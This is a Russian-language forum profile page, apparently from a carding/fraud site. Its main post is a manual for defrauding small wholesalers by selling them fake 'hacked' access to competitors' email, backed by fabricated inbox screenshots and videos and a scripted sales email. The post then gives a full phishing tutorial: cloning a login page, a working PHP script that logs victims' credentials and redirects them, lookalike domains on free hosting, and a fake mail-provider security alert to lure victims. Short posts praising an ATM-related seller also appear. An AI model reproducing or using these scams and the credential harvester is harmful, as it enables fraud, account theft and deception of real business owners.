Рады видеть вас на Ghost-Club.com

Зарегистрируйтесь сейчас, чтобы то бы вступить в наш клуб. После регистрации и входа в систему вы сможете создавать темы, отвечать на существующие темы, давать репутацию другим пользователям, получить свой собственный мессенджер, размещать обновления статуса, управлять профилем и многое другое. Это сообщение будет удалено после входа в систему.

Vishibala

Местные
  • Content Count

    10
  • Joined

  • Last visited

  • Days Won

    1
5

Community Reputation

5 Обычный

Recent Profile Visitors

148 profile views
  1. купил технику и пользуюсь уже пол года без проблем думал получу дешевый Китай, но ошибся)
  2. все получил, четко следовал инструкциям ТС по выбору банкомата и все прошло как обещали. Никаких проблем только большой +
  3. На протяжении всех времен люди были такими существами, которым никогда не давали покоя чужие тайны, чужие успехи, чужие знания. В те далекие времена в погоне за тайным знанием спокойно могла развязаться война. Многолетняя война. В наше время, войн, слава Богу (Аллаху, Будде), не затевают, но все так же хотят знать секреты других людей. Муж хочет знать, о чем пишет его жена, дети хотят знать переписки своих друзей, одноклассников. Коллеги по работе хотят знать, о чем думает в своих записях директор и наоборот. Но есть среди всех этих людей одна своеобразная «каста» тех, для кого тайны и знания ценятся сравнимо золоту. И называется эта каста – КОНКУРЕНТЫ! Давайте разберем небольшой пример, чтобы Вам был понятен ход мыслей. Прочитав его, вы должны сразу понять всю схему! Представьте, вы производите воду. Обычную питьевую воду. И продаете ее клиентам. Но есть ваш сосед через дорогу, который занимается тем же самым. Он один из ваших конкурентов. И вроде бы вы ведете отличную ценовую политику, и сервис налажен, и на рынке уже не один год. Но конкурент ваш все-равно продолжает существовать. Тем самым, логично предположить, что клиенты, которые могли бы быть вашими, являются его! Ключевая загвоздка в том, что вы не знаете кто эти клиенты. Так же вы не знаете, каким именно оборудованием пользуется ваш конкурент. Какой транспортной пользуется, какое сырье применяет. В общем. Не знаете основные моменты, которые могли бы помочь вам остаться на рынке в виде монополиста (образно). Прийти к конкуренту напрямую и спросить? Теоретически можно, но как-то он, наверное, не будет лоялен по отношению к вам и не захочет делиться своими тайнами. Можно сделать контрольную закупку, но этот вариант тоже не даст ничего дельного… Хм, что же делать? Вы догадались? Если нет, тогда смотрим дальше: Сидите вы думаете – рассуждаете и тут появляется НЕЗНАКОМЕЦ, который говорит вам: «Друг, а хочешь я дам тебе почту твоего конкурента, из которой ты увидишь с кем и ка кон ведет дела?». С какой вероятностью вы согласитесь? 99%. Вот и вся схема, если ее описать парой предложений. Теперь разберем по порядку. Самое время качать навыки СИ. Свой метод я называю «рыбалка». Читайте очень внимательно и вдумчиво!!! Итак, у нас есть 3 персонажа: А, Б, В. А и Б – это продавцы определенного товара. В – это их общий покупатель. ⦁ Выбираем отрасль бизнеса. Не замахивайтесь на гигантов индустрий. Берите обычных частников, продавцов товаров определенного вида. Например, торгаши мукой. (это только пример!!!) Открыли 2гис (яндекс, гугл) , вбили «продажа муки» и выбрали самые подходящие варианты. Такими будут те, которые занимаются мелким оптом. Понять это несложно, достаточно посмотреть их сайт или на крайний случай позвонить да прямо поинтересоваться. Итак, нашли продавцов А. и Б. Начнем с А. (закинули удочку) ⦁ После этого нам нужно узнать хотя бы одного – двух клиентов А. Как это сделать? Очень просто: звоним продавцу А (лучше с сим-карты, которой не пользуетесь), или пишем на почту и говорим, что хотели бы прикупить муки, че-по чем, сколько стоит и т.д. После чего говорим, что нас интересует мешков 5-10 (мелкий опт), заинтересованы мы в долгосрочном сотрудничестве, вроде, и цена у вас хорошая и условия приемлемы. И тут мы даем наживку, спрашивая: А ЕСТЬ ЛИ ТЕ, КТО МОГ БЫ ПОРЕКОМЕНДОВАТЬ ВАС? ПРОСТО ОТЗЫВОВ НЕТ НИКАКИХ. А НА СЛУХ ВСЕ ЗВУЧИТ ОТЛИЧНО! Как правило, продавец чутка потеряет бдительность и скорее всего назовет одного-двух покупателей (В), с которыми работает. Отлично, то что нам нужно! Заканчиваем разговор фразой типа спасибо, согласуем с руководством (или просто подумаем) и дадим вам знать. Не забудьте попросить почту, для обратной связи (если она не указана на сайте) ⦁ После того, как рыбка поймана, пора ее на сковородку. Для этого открываем фотошоп (я так делал). Можно через код элемента. Можете сымитировать почтовую переписку (создать несколько ящиков и поотправлять себе письма с определёнными темами, в данном случае с заказами на муку)! Нам нужно сделать СКРИНШОТ ПОЧТОВОГО ЯЩИКА ПРОДАВЦА А. Смотрим скрин Запомните, всегда у вас должны быть там бухгалтерские документы, письма от транспортной компании, заявки на товар. Сделали качественный скрин, сохранили! ⦁ Пишем на почту продавцу муки Б. (пишем с левого ящика) «Добрый день! Меня зовут Артур. Ваш конкурент заказал нам взлом вашего почтового ящика, заплатив 500 (1000, 2000, 3000)р. Но по своей же оплошности, дал нам доступ к своему. Собственно, мука нас не интересует, как и ваш бизнес в целом. Да и честная конкуренция всегда лучше нечестной. Поэтому предлагаю следующий вариант: 500 (1000, 2000, 3000)р и я дам вам логин – пароль от его почты. Если согласны, переводите сумму на карту (здесь киви карта). В качестве гарантии могу прислать скриншот с их почтового ящика» Вот такое простенькое письмо. Можете от себя что-то добавить. Поймите, мы не зря выбрали продавцов муки. Это такие люди, которые заинтересованы в выгоде. И на войне для них все средства хороши. Поэтому, максимум они попросят гарантии. Присылаем им скриншот от ящика. И тут фишка в том, что А и Б скорее всего знают покупателя (В). Поэтому, увидев на скриншоте письмо от В, продавец Б потеряет всякую бдительность и согласится на сделку! Я вам гарантирую это. Сам занимаюсь бизнесом индустриальным (кстати, могу рассказать и научить). Поэтому знаю, о чем говорю. ⦁ Деньги упали. Мы ушли в закат. ⦁ Через какое-то время (неделя- полторы) срабатываем по той же схеме с продавцом А. Вот такая, казалось бы, элементарная схема несет в себе золотые яички. Работает данный мануал в 90% случаев (при условии правильного выбора продавцов). Важно не спешить, рыбалка не любит суеты. ЧАСТЬ 2 Начну с моментов, когда наш клиент А. может отказаться от сделки: Если он недавно имел переписку с продавцом Б. (думаю тут все понятно, он срастит даты писем и поймет, что у нас фейк) Если скриншот недостаточно правдоподобен. (ошибки в оформлении) Если наш пациент знаком с клиентом Б лично. Итак, по первому пункту. Здесь чисто СИ. Если нам клиент А. говорит, что нет его письма в ящике у Б. Мы просто пишем: «одну минутку». И через некоторое время отвечаем, что проверили ящик, скорее всего он удалил письмо! По второму пункту: если проблемы с фш и кодом элемента, то можно сделать следующим образом: вы создаете фейковый ящики, штук 30. И создаете ящик продавца Б. (который мы якобы взломали). И начинаете писать на эту почту. В письмах должны быть АКТЫ СВЕРОК, ЗАКАЗЫ НА МУКУ, РЕКЛАМНЫЕ ПИСЬМА, ВСЯКИЙ МУСОР, ЛИЧНАЯ ПЕРЕПИСКА. Заголовки в темах писем делаешь соответствующие. И смотри какая фишка: одно рекламное письмо ты отправляешь и на фейковую почту и на почту продавца А!! Уловил мысль? Когда ты покажешь скриншот А., он увидит такое же письмо, которое приходило и ему. Этот момент должен полностью усыпить его бдительность. ВАЖНО ПОНИМТАЬ, ЧТО РЕДАКТИРОВАНИЕ ДАТЫ ПИСЕМ – ОБЯЗАТЕЛЬНО. Конечно, бывает так, что письма валят в день по 30 шт. Но лучше все-таки поправдоподобней все сделать. Поэтому письма должны быть во многих папках. Можете даже создать отдельные папки с названием «ПОСТАВКА», «БУХГАЛТЕРИЯ» и т.д. По третьему пункту все понятно, если клиенты знакомы лично, то тут уж ничего не сделаешь. КАКИЕ ВАШИ ДОКАЗАТЕЛЬСТВА? Что может быть лучше скриншота? Правильно, видео того, как ты входишь в почту конкурента! Для этого делается фейковый почтовый ящик. Но его нужно делать очень грамотно (как я писал выше, заполнить по уму: письма от ТК, акты сверок, заявки.) Далее на видео записываете, как вводите логин (логин должен совпадать с тем, что использует Б.) и пароль. После чего мышкой скролите, открываете папки спам, удаленные, отправленные. Все это делаете быстро. И желательно замазать тайную информацию (такую как имя поставщиков, имена заказчиков). Это подогреет интерес. Во многих видео редакторах есть такая возможность. ЕСЛИ КЛИЕНТ А. СКАЖЕТ, ЧТО СКИНЬ ТИПА МНЕ НА ПОЧТУ ПИСЬМО С ЯЩИКА Б. Отвечаем, что «в этом нет смысла, так как есть вероятность, что это действие будет замечено. Лишняя суета нам не нужна.» Мы должны показать себя профессионалами своего дела. Теоретически, вы даже можете в подписи к своему письму (тому, где вы говорите А. о том, что у вас есть доступ к почте конкурента) дать ссылку на форумы с отзывами тех ребят, которые реально занимаются взломом (пример могу дать если кому нужно будет, но там ТС пропал куда-то, хотя ветка с 2013-ого года работала) Вероятность того, что А. отпишет в их ветке крайне мала. Но зато наличие отзывов повысит вас в глазах клиента А. Вы прям ему так и пишите, что вот есть отзывы, пожалуйста. В совокупности с видео – эффект 99%.! РЕАЛЬНЫЙ ВЗЛОМ А вот это самое интересное. Давайте попробуем реально взломать продавца Б. Лучший способ для этого – фейк старница авторизации. Как ее сделать? Можно заказать за копейки, а можно самому сделать. Вот копипаст с одного форума: Фейк — это поддельная веб-страница, которая выглядит так же как и оригинал, но создана с целью передачи вводимых на ней паролей создателю. То есть когда вы вводите пароль на фейке, он сохраняется (создатель потом зайдёт и прочтёт ), а вас перебрасывает на настоящий сайт. Как сделать самому фейк Теперь неплохо было бы рассмотреть сам процесс создания таких страниц (фейков), а именно узнать подробнее обо всех вышеупомянутых операциях, проводимых с реальными страницами. Как было сказано ранее, это копирование, изменение и размещение. Копирование. Это самый первый этап, который мы производим для того, чтобы наша страница выглядела идентично реальной. Чтобы пользователь, зашедший туда, увидел привычную и знакомую форму входа и без лишних размышлений о адресе страницы ввёл свой логин и пароль (и подарил их нам ). Итак, как же будем копировать? Просто открываем нужный нам сайт в броузере opera (именно opera, так как она сохранит страницу точно так как нам нужно!), заходим на страницу авторизации (то есть чтобы у нас форма входа была на главном плане и чтобы пользователь не забыл ввести пароль ) и сохраняем эту страницу: файл — сохранить как… В появившемся окне выбираем тип сохраняемого файла: HTML-файл с изображениями, имя: index. Лучше сразу создать для фейка отдельную папку и туда скидывать все нужные для него файлы (в процессе создания у нас появится ещё несколько). Теперь нам нужно будет открыть исходный код сохранённой страницы и разобраться в нём. Для этого откроем файл блокнотом, но лучше скачайте такую замечательную программу какNotePad++. Я сам ей всегда пользуюсь, так как вещь это очень удобная, универсальная и намного лучше блокнота! (скоро сами поймёте почему. Я просто рекомендую :good Итак, открываем наш сохранённый index.htm текстовым редактором! Не пугайтесь, это совсем не так страшно как кажется! По уши в html. То что вы видите называется html кодом страницы (он же исходный код страницы, он же просто код ). Когда вы сохраняли страницу, рядом с полем для ввода логина и пароля наверняка были подписи (логично предположить что там было написано \»логин\», \»пароль\» ). Вот по ним и будем ориентироваться. Ищем среди всего этого безобразия такие слова. Рядом с ними на странице у нас располагались поля ввода логина и пасса. В html коде они будут выглядеть примерно вот так: <input type=\»text\» name=\»login\» value=\»\» …… <input type=\»password\» name=\»password\» …… имена полей (выделены жирным, в коде идут после \»name=\») не всегда будут именно login и password. Где-то это могут быть e-mail и pass , а где-то и username, parol. Зависит от фантазии тех, кто кодил страничку Для нас важно уметь увидеть имена этих полей среди всего остального кода! Ещё одна подсказка: блок с надписями \»логин\», \»пароль\» и формами ввода почти всегда находится в тэге <form>. Следующим действием мы должны запомнить (а лучше временно записать) имена этих полей. Далее мы будем их использовать в одном скрипте (который и будет заниматься записью паролей ). Итак, записали… ищем чуть выше глазами тэг <form> (он должен быть примерно в начале строки). После него идут некоторые параметры самой формы (в этой же строке). Примерно такое: <form name=\»login\» action=\»users/passcheck.php\» method=\»post\» onsubmit=\»return check();\»> Нас здесь интересует всё что подчёркнуто, а именно параметр action. для того чтобы наш фейк заработал, нам нужно после ввода пользователем значения запустить наш кое-какой хитрый скрипт (ладно, ладно, скоро расскажу что за скрипт ). Допустим, у нас он будет называться login.php. Вот и прописываем параметру action значение login.php (если параметраaction там нет — введите его сами: action=\»login.php\»). Так же стоит обратить внимание на параметр method (в той же строчке что form и action): он может иметь значение post или get. Для работы нашего скрипта там должно быть post (если не так — меняем!). С этим файлом у нас всё. Сохраняемся и закрываем. Этот загадочный скрипт… Как и обещал, сейчас расскажу о предназначении загадочного скрипта, уже не единожды упомянутого мной ранее в этом уроке. Он будет выполнять функцию перехвата и записи введённых в поля логина и пароля. Говоря русским языком, этот скрипт запишет логин и пароль обманутого пользователя. Сам скрипт не очень большой и не сложный, написан на языке php (в прошлом уроке я о нём уже упоминал) и выглядит вот так: code: <?PHP $Log = $_POST[\’login\’]; $Pass = $_POST[\’password\’]; $log = fopen(\»database.txt\»,\»at\»); fwrite($log,\»\\n $Log:$Pass \\n\»); fclose($log); echo \»<html><head><META HTTP-EQUIV=\’Refresh\’ content =\’0; URL=http://lleo.aha.ru/na/\’></head></html>\»; ?> Сейчас разберёмся что к чему… В первых двух строках переменным Log и Pass присваиваются значения соответствующих полей из предыдущего файла. Именно для этого мы записывали названия полей с сохранённой страницы: мы должны указать их скрипту. Меняем login и password из квадратных скобок на то, как были названы поля ввода на нашей сохранённой странице (Э! Кавычки не трогаем!). В третьей строке происходит открытие файла database.txt для записи. Можете назвать этот файл как хотите, хоть IIACCbI_JIOXOB.txt)) Главное — не забудьте как назвали (название должно быть написано английскими буквами) и создайте текстовый документ с таким именем в папке с фейком. Четвёртая строка — запись в файл строки вида \\n $Log:$Pass \\n, где \\n — переход на новую строку, $Log:$Pass — значения переменных с логином и паролем, записанные через двоеточие. Строка пятая — сохранение, закрытие файла. Последняя строка — редирект (переадресация) на другую страницу (пока юзверь не просёк что это фейк). В этой строчке после URL= вписываем адрес страницы, куда попадёт пользователь сразу после того как введёт логин и пароль (и снова будте аккуратны с кавычкой после адреса — она должна там быть!). Лучше всего отправить его на настоящуюстраницу (ну откуда там вы страничку копировали?) с сообщением о вводе неверного пароля. Тогда бедолага решит что что-то не так ввёл, попорбует снова и зайдёт, ничего не заподозрив! Итак, отредактировали скрипт как нам нужно, сохранили в файл с именем login.php (обратите внимание на расширение, а то ещё сохраните как login.php.txt ) в папку с фейком. Тестирование. Вот тут нам и пригодится localhost-сервер! Если у вас его нет — это замечательный повод его установить! ТЫЦ. Если вам тупо лень, можете пропустить тестирование и перейти сразу к размещению фейка в интернете, а потом уже протестировать. Итак, запускайте сервер localhost (кроме MySQL, сейчас он нам не понадобится) и закидывайте файлы из папки с фейком на серв (папка htdocs, помните?). Открывайте localhost в броузере. Должна загрузиться сохранённая нами страница. На ней вписывайте логин и пароль (что угодно английскими буквами и цифрами). После нажатия на enter у вас должна открыться страница, указанная в скрипте (помните про шестую строку, да?), а введённые логин и пароль должны были записаться в указанный в третьей строке файл. Открываем его, проверяем. Если вы всё сделали правильно и проверка прошла как по маслу, то можно переходить к следующему этапу — заливке на хост. Размещаем фейк в Интернете. Всё что нам для этого понадобится — бесплатный хостинг с поддержкой php (например, freehostia). Php нам нужен для того, чтобы работал наш скрипт, а бесплатный выбираем по понятным причинам. Нам необходимо зарегистрировать домен на этом хосте (страничку в интернете) с адресом (названием), похожим на адрес страницы, которую мы подделываем. Делаете вы, например, фейк сайта mail.ru, значит надо зарегестрировать что-то вроде mait, nail, moil, majl и т.п. (можно и mail если на хосте свободным будет). При этом хостер предоставит вам домен вида mail.freehostia.com, где mail — имя, которое вы регистрировали; freehostia — домен второго уровня (название хоста), от которого вы никуда не денетесь из-за бесплатности хостинга; com — доменная зона, в которой будет расположен ваш сайт (некоторые хостеры предоставляют возможность её выбора). Как вы поняли, мы должны зарегистрировать адрес, максимально похожий на реальный, чтобы это не бросалось пользователю в глаза. Зарегистрировались? Заходим в панель управления нашим сайтом и повторяем процедуру с тестированием на localhost-e. Внимание! С тремя маленькими различиями: Вместо папки htdocs заливаем всё на наш хост с помощью ftp или через файловый менеджер. Его найдёте в панели управления на хосте, хотя называться он может и \»файлы\» и \»диспетчер файлов\». Сообразите, надеюсь Вместо localhost будем открывать тот адрес, который мы зарегистрировали. Соответственно, файл с сохранёнными паролями будет находиться там же (http://наш_адрес/database.txt). В том же файловом менеджере обязательно поставьте файлу database.txt (или как там он у вас называется?) максимальные права доступа — 777 Наш фейк готов! Осталось только сделать так, чтобы пользователь зашёл туда и ввёл свой пароль. Заманиваем жертву на фейк. На этом этапе нам придётся импровизировать. Для начала, нужно придумать предлог, под которым жертва должна пройти по ссылке и ввести свой логин и пароль на соответствующем ресурсе. Тут всё зависит от тематики подделанного вами сайта и интересов жертвы. Собственно, как вы будете впаривать ссылку, можете придумать только вы сами. Остаётся один маленький нюанс: адрес нашего фейка не соответствует адресу реального ресурса, и жертва может вам просто не поверить. Тут есть два варианта. Первый — сказать что это, якобы, альтернативная страница авторизации или страница для админов (что резко увеличит желание жертвы там авторизоваться). Второй вариант — после адреса фейка приписать какой-нибудь интересный текст. Сейчас поясню. Допустим, адрес реального сайта был http://site.ru/, а адрес созданного нами фейка — http://site.ourhoster.com/. Выглядит как-то палевно. Чтож, сделаем наш адрес таким: http://site.ourhoster.com/RAZDACHA_UINOV_6-dig-BESPLATNO! и дадим эту ссылку жертве под соответствующим предлогом. Ну кто же будет смотреть на первую часть адреса? IMG: http://s31.ucoz.net/sm/24/dollar.gif Для того, чтобы такая ссылка сработала, нужно залить на хост всего один файл — htaccess(заливать прямо в корневую папку). Теперь после адреса (только через слэш /) можно писать любой текст (хоть с пробелами, хоть русскими буквами), а жертва всё-равно попадёт на фейк. Далее мы в ящике жертвы пишем, что забыли пароль и просим с помощью смс его сбросить. В это же время присылаем с почты поддержки (мейл, яндекс и т.д. понятное дело, мы делаем фейк) письмо на почту Б. о том, что в ваш аккаунт пытались войти злоумышленники. Чтобы обезопасить себя от такого действия, пройдите авторизацию. С уважением, команда мейл. И даем ссылку на наш фейк почтовый. Все. Клиент клюнет. Школьник может не клюнуть, очень продвинутый пользователь может не клюнуть, а вот рядовой деятель (с которыми мы и работаем) поведется сто процентов. ЭТО ПРОВЕРЕННО! И вот тогда, мы можем смело просить не 3000р, а все 8000! И даже больше! Таким образом, в случае успеха, нам даже не придется врать А. Все честно. И есть вероятность того, что он нас порекомендует в дальнейшем еще кому-то. ЧУЖИМИ РУКАМИ Если есть те, кто может взломать нужный почтовый ящик нам, то можете воспользоваться их услугами. Дайте им свою почту и проследите, по какому алгоритму они будут работать (это вам пригодится для собственного взлома). Скорее всего это будет фишинг. Вас они не взломают, а вот продавца Б. вполне могут. Главное никаких предоплат. Просите максимум доказательств! РЕЗЮМЕ КАК ВИДИТЕ, НИЧЕГО СЛОЖНОГО НЕТ. ГЛАВНОЕ НЕ ТОРОПИТЬСЯ, БЫТЬ ВНИМАТЕЛЬНЫМ К ДЕТАЛЯМ. ОДИН РАЗ ПРОВЕРНУЛИ СДЕЛКУ (НАПРИМЕР, С МУКОЙ) И ИЩИТЕ СЛУДУЮЩЕГО ПРОДАВЦА МУКИ. ВАМ УЖЕ НЕ ПРИДЕТСЯ ВСЕ ГОТОВИТЬ ЗАНОГО. ПРОБУЙТЕ ВАРИАНТЫ, МОЖНО ПРЕДЛАГАТЬ СЛИВАТЬ ЗАКАЗЫ ЗА 500Р. МОЖНО… ДА МНОГО ЕЩЕ ЧТО МОЖНО.